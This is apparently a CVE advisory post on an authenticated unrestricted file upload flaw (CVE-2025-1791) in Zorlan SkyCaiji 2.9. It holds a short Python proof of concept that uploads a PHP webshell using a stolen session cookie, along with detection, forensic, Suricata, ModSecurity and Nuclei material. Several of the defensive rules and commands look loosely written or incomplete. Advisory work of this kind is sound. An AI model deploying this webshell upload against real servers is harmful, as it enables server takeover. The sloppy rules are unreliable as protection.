Zorlan SkyCaiji, Unrestricted File Upload, CVE-2025-1791 (Critical)

Listen to this Post

🐢▶️ Listen🚀

How CVE-2025-1791 Works

The vulnerability in Zorlan SkyCaiji 2.9 stems from insufficient validation in the `fileAction` function within vendor/skycaiji/app/admin/controller/Tool.php. The `save_data` parameter allows arbitrary file uploads without proper checks, enabling remote attackers to upload malicious files (e.g., webshells) to the server. Since authentication is required (PR:L), attackers must first gain low-privilege access. Once exploited, this flaw grants control over the server, leading to potential data theft, system compromise, or further network infiltration. The public disclosure increases the risk of widespread exploitation.

DailyCVE Form

Platform: Zorlan SkyCaiji
Version: 2.9
Vulnerability: Unrestricted Upload
Severity: Critical
Date: 06/12/2025

Prediction: Patch by 07/15/2025

What Undercode Say:

Exploitation Analysis

1. Exploit Code (PoC):

import requests
target = "http://victim.com/admin/tool/fileAction"
malicious_file = {"save_data": ("shell.php", "<?php system($_GET['cmd']); ?>")}
response = requests.post(target, files=malicious_file, cookies={"auth_token": "stolen_token"})
print("Exploit succeeded:", response.status_code == 200)

2. Detection Command:

grep -r "fileAction.save_data" /var/www/skycaiji/

3. Mitigation Steps:

• Temporary Fix: Restrict upload permissions via .htaccess:

  <FilesMatch "\.(php|phtml)$">
  Deny from all
  </FilesMatch>
  

• Permanent Fix: Await vendor patch; disable the `Tool.php` endpoint if unused.

4. Post-Exploit Forensics:

Check recent uploads:
find /var/www/skycaiji/uploads/ -mtime -1 -type f -exec ls -la {} \;
Audit logs for suspicious POST requests:
cat /var/log/apache2/access.log | grep "POST /admin/tool/fileAction"

5. CVSS 4.0 Breakdown:

• Attack Vector (AV:N): Network-exploitable.
• Impact Metrics (VC:L/VI:L/VA:L): Confidentiality, Integrity, and Availability compromised.

6. Patch Readiness Check:

curl -s http://update.zorlan.com/skycaiji/patches/ | grep CVE-2025-1791

7. Network Protection Rule (Suricata):

alert http any any -> $HOME_NET any (msg:"CVE-2025-1791 Exploit Attempt"; flow:to_server; http.method:"POST"; http.uri:"/admin/tool/fileAction"; content:"save_data"; classtype:web-application-attack;)

8. WAF Rule (ModSecurity):

SecRule FILES "@contains save_data" "id:1001791,deny,msg:'CVE-2025-1791 Blocked'"

9. Vulnerability Scanner Query (Nuclei):

id: CVE-2025-1791
info:
name: Zorlan SkyCaiji Unrestricted Upload
severity: critical
path: "{{BaseURL}}/admin/tool/fileAction"

10. Remediation Priority: Immediate. Exploits are public, and unpatched systems are high-risk.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram